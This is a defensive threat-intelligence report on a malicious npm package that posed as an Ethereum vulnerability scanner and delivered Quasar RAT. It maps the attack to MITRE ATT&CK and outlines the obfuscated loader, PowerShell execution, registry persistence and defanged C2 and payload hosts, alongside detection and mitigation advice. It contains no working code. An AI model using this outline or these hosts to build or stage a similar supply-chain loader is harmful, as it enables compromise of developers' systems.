Full Report
Cybersecurity researchers have discovered a malicious package on the npm package registry that masquerades as a library for detecting vulnerabilities in Ethereum smart contracts but, in reality, drops an open-source remote access trojan called Quasar RAT onto developer systems. The heavily obfuscated package, named ethereumvulncontracthandler, was published to npm on December 18, 2024, by a user
Analysis Summary
# Tool/Technique: Quasar RAT deployed via Malicious npm Package
## Overview
A malicious npm package named `ethereumvulncontracthandler`, published by user "solidit-dev-416," was used to deploy the open-source Remote Access Trojan (RAT) known as Quasar RAT onto victim systems, targeting developers. The package functions as an initial loader, using heavy obfuscation to download and execute the final payload.
## Technical Details
- Type: Malware (RAT) delivered via Supply Chain Attack (npm package)
- Platform: Windows systems (specifically mentioned target for RAT execution)
- Capabilities: Remote control, information gathering, persistence, C2 communication.
- First Seen: December 18, 2024 (npm package publication date)
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1204 - User Execution
- T1204.002 - Malicious File
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- TA0003 - Persistence
- T1547 - Boot or Logon Autostart Execution
- T1547.001 - Registry Run Keys / Startup Folder (Implied via Registry modification)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Initial Access:** Exploits the npm supply chain by tricking developers into installing the malicious package (`ethereumvulncontracthandler`).
- **Obfuscation:** Malicious script utilizes Base64-encoding, XOR-encoding, and minification to resist analysis.
- **Loader Functionality:** Retrieves and executes a second-stage payload from a remote server.
- **Execution Chain:** Executes PowerShell commands to initiate the final Quasar RAT deployment.
### Advanced Features
- **Anti-Analysis:** Performs checks to avoid running within sandboxed environments.
- **Persistence:** Establishes persistence on Windows systems via modifications to the Windows Registry.
- **C2 Communication:** Connects to a command-and-control server to receive further instructions, allowing for complete surveillance and control over the compromised host.
## Indicators of Compromise
- File Hashes: [Not explicitly provided in the context]
- File Names: [Not explicitly provided in the context, likely obscured]
- Registry Keys: [Implied Windows Registry modifications for persistence]
- Network Indicators:
- Second-Stage Payload Server: `jujuju[.]lat`
- C2 Server: `captchacdn[.]com:7000`
- Behavioral Indicators:
- Execution of PowerShell scripts following installation of a specific npm package.
- Modifications to the Windows Registry for persistence.
- Outbound connections to C2 infrastructure.
## Associated Threat Actors
- Various threat actors have historically used Quasar RAT for cybercrime and cyber espionage campaigns.
- The specific actor behind this npm campaign is associated with the user "solidit-dev-416."
## Detection Methods
- **Signature-based detection:** Signatures targeting known Quasar RAT binaries or specific network traffic patterns associated with its C2 infrastructure.
- **Behavioral detection:** Monitoring for unusual PowerShell execution initiated by package installation scripts, particularly those involving remote script retrieval and obfuscated execution.
- **YARA rules:** Rules targeting the obfuscated coding patterns or known binary signatures of Quasar RAT payloads.
## Mitigation Strategies
- **Prevention Measures:** Scrutinize dependencies, especially those from unknown or newly created authors on public registries like npm.
- **Hardening Recommendations:** Implement strict application control to limit PowerShell script execution, use signature or behavior-based endpoint detection and response (EDR) systems, and isolate development environments where possible.
- **Supply Chain Security:** Validate the reputation and activity levels of open-source packages before integration; rely less on superficial popularity metrics like GitHub stars.
## Related Tools/Techniques
- **Quasar RAT:** The final payload, a well-known open-source RAT.
- **Supply Chain Compromise:** The primary initial access technique utilized via malicious npm packages.
- **Obfuscation Techniques:** Base64, XOR, and minification.